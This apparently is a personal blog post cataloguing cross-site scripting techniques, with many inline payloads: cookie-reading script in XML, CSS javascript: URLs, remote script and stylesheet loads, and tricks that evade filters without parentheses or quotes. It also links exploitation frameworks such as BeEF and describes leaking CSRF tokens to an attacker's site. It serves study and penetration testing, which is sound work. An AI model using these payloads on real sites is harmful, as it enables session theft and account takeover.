XSS

Insights and techniques:

  1. A very good post that talks about all possible ways of doing xss inside css, which can be used in hidden input tags
    1. http://blog.innerht.ml/cascading-style-scripting/
  2. Advanced XSS attack vectors – including DNS pinning, IMAP3, MHTML, Hacking JSON
    1. http://cdn.ttgtmedia.com/searchSoftwareQuality/downloads/XSS_Chapter05.pdf
  3. You can do xss inside xml by using html inside xml – poc code:
    <?xml version=”1.0″?><html:html xmlns:html=’http://www.w3.org/1999/xhtml‘><html:script>alert(document.cookie);</html:script></html:html>

    1. poc: http://warzone.elhacker.net/xss.xml
  4. Xss vector lists:
    1. http://pastebin.com/u6FY1xDA
    2. https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
  5. Javascript includes: <BR SIZE=”&{alert(‘XSS’)}”>
  6. Inline css import: <STYLE>@import’http://ha.ckers.org/xss.css&#8217;;</STYLE>
  7. example of xss in css: body { background-image: url(‘javascript:alert(“XSS”);’) }
  8. mozilla bindings: <STYLE>BODY{-moz-binding:url(“http://ha.ckers.org/xssmoz.xml#xss&#8221;)}</STYLE>
  9. Inline css definition: <STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
  10. Another inline css definition: <STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
  11. If they search regular expression for < > and js between them then here is a bypass: <SCRIPT =”>” SRC=”http://ha.ckers.org/xss.js”></SCRIPT&gt;
  12. New xss posted here:
    1. https://twitter.com/XSSVector
  13. This one works on chrome: <iframe srcdoc='<svg/onload=alert(/@80vul/)>’>
  14. A nice trick which can be used in xss inside an input tag instead of doing onmousemove: forcing input to be focused and running script onfocus, write “autofocus” in it, for example: <input onfocus=alert() autofocus>
  15. A technique to write a string without ” is to use / instead, like in the example above, /@80vul/ is the same as “@80vul”
  16. Another trick: undefined=’alert(1)’; eval(eval(typeof a))
  17. Technique: you CAN use unicode just in the middle of the javascript, for example alert() is the same as \u0061lert()
  18. IE 8 xss filter bypass (and using EmulateIE7 to make ie use older xss filters):
    1. http://zone.wooyun.org/content/1411
    2. https://media.blackhat.com/bh-eu-10/presentations/Lindsay_Nava/BlackHat-EU-2010-Lindsay-Nava-IE8-XSS-Filters-slides.pdf
    3. http://www.thespanner.co.uk/2014/04/07/bypassing-the-xss-filter-using-function-reassignment/
  19. bypass ie9 xss filter
    1. http://www.thespanner.co.uk/2014/05/06/mxss/
    2. http://seclists.org/bugtraq/2012/Oct/100
  20. Site thats lets interactivly build xss vectors:
    1. https://hackvertor.co.uk/public
  21. Data Uri – data: URI allows embedding a file including its file content in a page….”An attacker can create DOC and PDF files that may contain malicious payload for exploiting various overflow vulnerabilities. An attacker may also create a backdoor, which will either initiate a new connection or listens for a new connection. Generating Netcat might be an option.”
    poc: sbG8iKTs8L3NjcmlwdD4=”>
    or write in url bar: data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=
  22. Scriptless xss using existing html logic:
    1. http://lcamtuf.coredump.cx/postxss/
  23. use open ” in xss without closing it in src of image to your evil site to make all the rest of the content of the page be sent to you and then find the csrf token there and use it for csrf or find other sensitive info…all this without using javascript or active content
    1. http://www.skeletonscribe.net/2011/05/js-less-xss.html
  24. Cool technique for xss without parenthesis!! You override the onerror event and then use throw keyword which doent need parentheses and it takes a parameter and then calls the function which overrided onerror with the parameter after throw keyword.
    poc for chrome:
    onerror = eval
    Uncaught = 2
    throw ‘;alert\x281\x29’

    1. http://www.thespanner.co.uk/2012/05/01/xss-technique-without-parentheses/
  25. Another technique for xss without parenthesis using location.href=…, but to not use single quotes, the string is inserted as another made-up attribute of the input tag
    1. http://www.ness.ch/misc/?post%2F2011%2F01%2F08%2FExample-of-Cross-Site-Scripting-(XSS)-without-any-need-of-parenthesis-or-single-quote
  26.  String.FromCharCode and unescape techniques can be used to bypass blacklist
    1. https://www.martineve.com/2007/05/23/string-fromcharcode-encoder/
    2. http://www.wocares.com/noquote.php
  27. Many tricks to bypass blacklist
    1. http://jesse.m6.net/blog/?p=137
    2. http://nileshkumar83.blogspot.co.il/2012/05/bypassing-xss-filter-in-alert-msg-box_18.html
  28. javascript in CSS
    1. http://stackoverflow.com/questions/476276/using-javascript-in-css
  29. javascript xss payload- scanning ports by trying to load IMG from diffrent ports on target
    1. http://www.gnucitizen.org/blog/javascript-port-scanner/
  30. Attack vectors with xss:
    1. http://yehg.net/lab/pr0js/papers/What%20XSS%20Can%20Do.pdf
  31. Myspace worm summary:
    1)can use document.all.mycode instead of document.getElementById(“mycode”)
    2)can put data in another custom attribute, for example called expr, and then retrieve it using document.all.mycode.expr
    3)it used a bunch of common blacklist bypass techniques like splitting a string into concatanation, using String.fromCharCode, using a[“b”] instead of a.b

    1. http://namb.la/popular/tech.html
  32. Xss without special characters:
    1. http://security.stackexchange.com/questions/36629/cross-site-scripting-without-special-chars
  33. Javascript in Css:
    1. http://stackoverflow.com/questions/476276/using-javascript-in-css
  34. Running any javascript command using only 6 characters: ),(,!,[,],+. I advise to also understand how it works, their code can be improved a bit to produce shorter encoded strings (they use function of array just to get its constructor so they can use a function with a shorter name)
    1. http://www.jsfuck.com/
  35. A very interesting blog
    1. http://www.thespanner.co.uk/
    2. http://www.thespanner.co.uk/2013/10/23/new-operator/
  36. “Irv is a proof-of-concept of the improved request validation engine for ASP.NET Framework to prevent Type-1 (reflected) XSS attacks. It provides a higher security level than the original one because of extended logic of request validation and written from scratch response validation module.”
    1. https://github.com/kochetkov/Irv
  37. Xss expert twitter
    1. https://mobile.twitter.com/garethheyes
  38. Doing xss in value of hidden input when >,< are encoded is possible: <input type=hidden style=`x:expression(alert(/ @garethheyes /))`> also notice that ` can be used instead of ‘,”. However the expression command only works on old browsers
    1. https://mobile.twitter.com/XSSVector/status/235986789041598464?screen_name=XSSVector

Xss scanners, frameworks and other tools:

  1. snuck – xss filter bypass tool
    1. https://code.google.com/p/snuck/
  2. Beef – xss post exploitation framework, can be integrated with metasploit to deliver metasploit payloads to victim
    1. http://beefproject.com/
    2. https://sathisharthars.wordpress.com/2014/07/23/integrating-metasploit-with-browser-exploitation-framework/
  3. XssShell – Xss framework that seems to be much easier to install than beef (beef needs ruby and gyms while this one doesn’t)
    1. http://labs.portcullis.co.uk/application/xssshell/
    2. http://www.darknet.org.uk/2006/12/xss-shell-v039-cross-site-scripting-backdoor-tool/
  4. xssf – another xss framework
    1. https://code.google.com/p/xssf/
  5. http://xss-scanner.com/
  6. firefox plugin http://find-xss.net/news/article/find-xss-fire/
  7. http://www.domxssscanner.com/
  8. pretty nice firefox plugin but not very quiet https://addons.mozilla.org/En-us/firefox/addon/xss-me/
  9. OWASP Xenotix XSS Exploit Framework – nice gui but when I used it, it sucked finding xss and even crashed https://www.owasp.org/index.php/OWASP_Xenotix_XSS_Exploit_Framework
  10. fiddler watcher addon is very good to passively detect reflected content while you slide the website http://webcache.googleusercontent.com/search?q=cache:nIVK7kpx9s4J:https://websecuritytool.codeplex.com/+
  11. fiddler x5s addon is good to detect which characters are reflected but its not very quiet although by configuring it well you can make it a bit more quiet http://xss.codeplex.com/
Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s